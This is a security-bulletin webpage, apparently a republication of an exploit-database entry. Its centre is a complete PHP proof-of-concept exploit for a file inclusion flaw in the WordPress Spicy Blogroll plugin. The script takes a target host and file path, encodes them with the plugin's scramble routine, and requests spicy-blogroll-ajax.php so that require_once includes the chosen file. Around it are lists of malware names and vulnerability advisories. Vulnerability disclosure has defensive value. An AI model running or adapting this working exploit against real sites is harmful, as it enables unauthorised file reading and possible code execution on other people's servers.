Security Bulletins
Latest Malware Updates
Downloader.Busadom!g102/27/2015Infostealer.Posteal02/26/2015Downloader.Busadom02/26/2015Trojan.Ladocosm02/26/2015SONAR.SuspDocRun02/25/2015SONAR.SuspHelpRun02/25/2015W32.Tempedreve.D!inf02/25/2015SONAR.PUA!AlnadInsta02/25/2015SONAR.Infostealer!g502/25/2015SONAR.Infostealer!g402/25/2015 |
07/13/2013
Wordpress Spicy Blogroll Plugin - File Inclusion Vulnerability<?php// Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability // Date: 12-07-2013 (GMT+8 Kuala Lumpur) // Author: Ahlspiess // Greetz: All TBDIAN - http://w3.tbd.my :) // Screenshot: http://i.imgur.com/jIrUznC.png /** Details: File: /wp-content/plugins/spicy-blogroll-ajax.php SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php <?php ... ... $link_url = $_GET['link_url']; $link_text = $_GET['link_text']; $var2 = unscramble($_GET['var2']); $var3 = unscramble($_GET['var3']); $var4 = unscramble($_GET['var4']); $var5 = unscramble($_GET['var5']); $nonce = unscramble($_GET['var11']); require_once($var2.$var4); <-- Boom ... ... */ if(!isset($argv[3])) { die(sprintf("php %s <host> <path> <file>\n", $argv[0])); } list(,$host, $path, $file) = $argv; $vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s'; $request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file))); $opts = array( 'http'=>array( 'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0", 'ignore_errors' => true, ) ); $context = stream_context_create($opts); echo file_get_contents($request, 0, $context); /** Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php Line: 386-401 */ function scramble($text1,$rng = 1){ $len=strlen($text1); $rn=$rng%2; $count=7; $seed=($rn%=2)+1; $text2=chr($seed+64+$rng).chr($rng+70); for($i=0; $i<=$len-1; $i++) { $seed*=-1; $count+=1; $ch=ord(substr($text1,$i,1))+$seed; if($ch==92){$ch.=42;} $text2.=chr($ch); if($count%5==$rn){$text2.=chr(mt_rand(97,123));} } return $text2; } ?> |
Security Advisories Database
Remote Code Execution Vulnerability in Microsoft OpenType Font DriverA remote attacker can execute arbitrary code on the target system. 07/21/2015Multiple Vulnerabilities in Linux kernel03/04/2015SQL Injection Vulnerability in PiwigoSQL inection vulnerability has been discovered in Piwigo. 02/05/2015Cross-site Scripting Vulnerability in DotNetNukeA cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke. 02/05/2015Cross-site Scripting Vulnerability in Hitachi Command SuiteA cross-site scripting vulnerability was found in Hitachi Command Suite. 02/02/2015Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk HandlingAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-ForwardsAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"An attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Linux Kernel spliceAn attacker can perform a denial of service attack. 01/29/2015Denial of service vulnerability in Python Pillow Module PNG Text Chunks DecompressionAn attacker can perform a denial of service attack. 01/20/2015 |